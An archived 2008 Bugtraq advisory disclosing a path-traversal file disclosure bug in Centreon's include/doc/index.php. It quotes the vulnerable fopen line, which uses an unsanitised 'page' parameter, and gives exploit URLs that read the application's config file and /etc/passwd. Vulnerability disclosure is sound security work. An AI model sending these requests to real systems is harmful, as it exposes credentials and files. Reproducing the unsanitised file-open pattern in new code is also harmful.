lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20080229152723.16600.qmail@securityfocus.com> Date: 29 Feb 2008 15:27:23 -0000 From: sys-project@...mail.com To: bugtraq@...urityfocus.com Subject: Centreon <= 1.4.2.3 (index.php) Remote File Disclosure [+] Info: [~] Software: Centreon <= 1.4.2.3 [~] HomePage: http://www.centreon.com [~] Exploit: Remote File Disclosure [High] [~] Where: include/doc/index.php [~] Bug Found By: Jose Luis Góngora Fernández|JosS [~] Contact: sys-project[at]hotmail.com [~] Web: http://www.spanish-hackers.com [~] Spanish Hackers Team [SHT] [+] Bug In include/doc/index.php: [~] line 33: $doc = fopen("../doc/".$oreon->user->get_lang()."/".$_GET["page"], "r"); [+] Exploit: [~] /include/doc/index.php?page=../../www/oreon.conf.php [~] /include/doc/index.php?page=../../../../../etc/passwd [~] /include/doc/index.php?page=[Local File]